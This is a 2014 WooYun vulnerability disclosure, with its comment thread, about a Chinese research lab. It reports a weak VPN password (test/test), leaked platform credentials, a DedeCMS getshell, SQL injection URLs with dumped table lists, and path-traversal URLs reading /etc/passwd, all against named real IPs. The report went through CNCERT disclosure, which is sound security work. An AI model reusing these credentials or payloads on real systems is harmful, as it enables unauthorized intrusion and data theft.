当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070084

漏洞标题:由某国家重点实验室VPN系统弱口令致内网安全风险

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-07-29 09:11

修复时间:2014-09-12 09:12

公开时间:2014-09-12 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-29: 细节已通知厂商并且等待厂商处理中
2014-08-03: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向核心白帽子及相关领域专家公开
2014-08-23: 细节向普通白帽子公开
2014-09-02: 细节向实习白帽子公开
2014-09-12: 细节向公众公开

简要描述:

由某国家重点实验室VPN系统弱口令致内网安全风险

详细说明:

一、
资源与环境信息系统国家重点实验室VPN系统.https://159.226.110.180/

1.png


1.弱口令:用户/密码:test/test

2.png


2.登录VPN,杀入内网系统:
中国科学院地理科学与资源研究所内部办公网
大量邮箱地址(http://192.168.100.1/xwxx/mailc.htm)
以及联系方式(http://192.168.100.1/xwxx/dhhm.mht)

3.png

4.png

5.png


3.
(1)登录其数据在线平台:
JCR期刊分区数据在线平台
帐号:igsnrr 密码:dlstsg
http://www.fenqubiao.com/Core/Category.aspx?id=358

6.png

7.png


(2)全球产品样本数据库(GPD)可直接登录:gpd.las.ac.cn/Default.aspx

8.png

9.png


二、
(1)DEDECMS系统 getshell
http://159.226.110.214/
http://159.226.110.214/dede

10.png

11.png


(2)同时影响网站:http://carbontracker.net/
(http://www.qdstc.gov.cn/nv.aspx?id=36190)
http://carbontracker.net/images/test.txt

科技日报讯 (记者张晶)记者从中国科学院地理科学与资源研究所获悉,我国首个高时空分辨率碳同化反演系统——中科院碳追踪同化系统(CarbonTracker-China,CAS)于日前发布。依据该软件系统,可以通过大气二氧化碳浓度的观测数据来估算陆地生态系统碳源碳汇的分布信息。

13.png

12.png


三、
973计划资源环境领域项目数据汇交服务网 http://159.226.110.224/
(1)注入:http://159.226.110.224/news/newsdetails.jsp?id=8

14.png

web application technology: JSP
back-end DBMS: Oracle
Database: DASN973_2
[27 tables]
+------------------------------+
| ARCHIVEDATA                  |
| ARCHIVEPROGRESS              |
| CATEGORY_NEWS                |
| CATEGORY_PROJECT             |
| CATEGORY_USER_DEGREE         |
| CATEGORY_USER_INDUSTRY       |
| MESSAGES                     |
| METADATA                     |
| METADATA_AVAILABLEDATA       |
| METADATA_BAK                 |
| METADATA_CONTACTS            |
| METADATA_YUAN                |
| NEWS                         |
| NEWS_CATEGORY                |
| PAPER                        |
| PROJECT                      |
| PROJECT_CATEGORY             |
| PROJECT_PERSON               |
| SITE_DOWNLOADS               |
| SITE_DOWNLOADS_20120301_1413 |
| SITE_DOWNLOADS_BAK           |
| SITE_DOWNLOADS_GLOBAL        |
| SITE_VISITS                  |
| SITE_VISITS_GLOBAL           |
| STAT_METADATA_HITS           |
| USERS                        |
| WEBSITE_INVESTIGATION        |
+------------------------------+


(2)任意文件下载:
http://159.226.110.224/docs/download.jsp?path=../../../../../../../etc/passwd
http://159.226.110.224/docs/download.jsp?path=/WEB-INF/web.xml
http://159.226.110.224/docs/download.jsp?path=/metadata/accessData.jsp

15.png


四、
国家生态系统观测研究网络 http://159.226.110.244/index.action
注入:http://159.226.110.244/getContent.action?id=2256&class_id=77&article_class_id=77

16.png

web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: db_cmschn
[57 tables]
+---------------------------+
| announce                  |
| announce_class            |
| article                   |
| article_audit             |
| article_class             |
| article_class_ext_image   |
| article_color_templet     |
| article_img               |
| article_pagination        |
| article_source            |
| article_special           |
| class_priv                |
| cluster_node              |
| config_file_upload        |
| config_member             |
| config_member_column      |
| config_site               |
| login_info                |
| map_class_user            |
| map_group_article_class   |
| map_group_module          |
| map_user_module           |
| member_info               |
| member_upgrade_key        |
| public_map_object_purview |
| sa_user                   |
| search_index_db           |
| search_index_resource     |
| stat_site_counter         |
| sys_action_mapping        |
| sys_actions               |
| sys_config                |
| sys_data_bak              |
| sys_data_bak_tables       |
| sys_group                 |
| sys_ip_res                |
| sys_log_oper              |
| sys_log_type              |
| sys_log_user              |
| sys_module                |
| sys_public_attribute      |
| sys_resource              |
| sys_restricts             |
| sys_sequence              |
| sys_stat_count_info       |
| sys_stat_count_search     |
| sys_stat_count_site       |
| sys_templet               |
| sys_templet_class         |
| sys_templet_editor        |
| uip_consultation          |
| uip_content               |
| uip_menu                  |
| uip_menukind              |
| user_group_purview_map    |
| user_purview_map          |
| vote                      |
+---------------------------+


漏洞证明:

如上

修复方案:

各种修复.

版权声明:转载请注明来源 袋鼠妈妈@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-03 08:58

厂商回复:

最新状态:

2014-08-04:CNVD确认并复现所述情况,已经转由CNCERT向中国科学院计算机网络管理中心通报处置,并向某设备生产厂商通报。

漏洞评价:

评论

  1. 2014-07-29 09:12 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    标题要长才v587啊~

  2. 2014-07-29 09:14 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    这TM的标题比我前几天发的还长

  3. 2014-07-29 09:21 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    好长的标题...Mark

  4. 2014-07-29 09:42 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    咔擦。。。泥煤喔。。不带我。。而且标题这么叼。。你来了这里揍你。哼

  5. 2014-07-29 09:49 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    洞主好长

  6. 2014-07-29 09:52 | 炊烟 ( 普通白帽子 | Rank:238 漏洞数:44 | 每一天都需要努力。)

    我看了标题才进来的。。。

  7. 2014-07-29 10:03 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    论标题长度的重要性!!!

  8. 2014-07-29 10:11 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @zph @U神 @Jack.Chalres @泳少 @铁蛋火车侠 @炊烟 @noob 呃..看来大牛们的评论,顿时觉得我逗比了~不小心透露的长短.捂脸了~有怪莫怪.你最可爱!

  9. 2014-07-29 10:28 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    zone进不去了。。刷一条标题真他妈长

  10. 2014-07-29 10:48 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    阿尔法实验室~

  11. 2014-07-29 11:41 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    你们在比谁的标题长吗

  12. 2014-07-29 11:44 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    洞主标题这么长乌云知道吗

  13. 2014-07-29 12:18 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    为什么zone进不去了?撸主的标题好长

  14. 2014-07-29 13:09 | varas-ra ( 路人 | Rank:21 漏洞数:7 | varas-ra)

    能进内网 就可以点到为止了

  15. 2014-07-29 15:22 | 10457793 ( 普通白帽子 | Rank:867 漏洞数:128 | 说好的借,为什么从来不还?O(∩_∩)O)

    为什么zone进不去了?撸主的标题好长

  16. 2014-07-29 15:29 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    @10457793 zone被解析到美国的地址了(184.168.221.79),怎么搞的

  17. 2014-07-29 16:06 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    @10457793 没看新闻啊,sinaapp.com出问题了,用这个地址 http://wzone.vipsinaapp.com/

  18. 2014-07-29 16:18 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    啥时候才能摆脱路人啊

  19. 2014-07-29 23:56 | Moo ( 路人 | Rank:8 漏洞数:3 | PS:不打脸,还要泡妞呢)

    @nzk1912 佛曰:剧透死全家。。。。。

  20. 2014-08-01 07:26 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    @Moo 不知所云

  21. 2014-09-12 09:14 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    @铁蛋火车侠 找到你了,快回家吧。你男朋友跟你同班那个男的跑了,今早上还问我借了50块钱,当时老子就不该借的。哎!

  22. 2014-09-12 10:20 | JulyTornado ( 普通白帽子 | Rank:339 漏洞数:43 | 善战者,无赫赫之功)

    第二百八十五条 违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。

  23. 2014-09-12 10:53 | mr_dion ( 路人 | Rank:5 漏洞数:2 | 面临就业大学生)

    测试过了吧

  24. 2014-09-12 16:44 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    @JulyTornado 所以赶紧离学校实验室远远的- -

  25. 2014-09-12 20:33 | JulyTornado ( 普通白帽子 | Rank:339 漏洞数:43 | 善战者,无赫赫之功)

    @Bird 这也要看哪个学校了。。。

  26. 2014-09-12 23:52 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    @JulyTornado 当时我们专业课老师就告诉我们这个- - 好像是什么保密级别吧。

  27. 2014-09-13 06:23 | JulyTornado ( 普通白帽子 | Rank:339 漏洞数:43 | 善战者,无赫赫之功)

    @Bird 话说你也是学信息安全的?当年老师没讲这么具体,只是告诉我们要遵守道德底线- -

  28. 2014-09-13 11:08 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    @JulyTornado @JulyTornado 恩恩 是啊~ 学长好~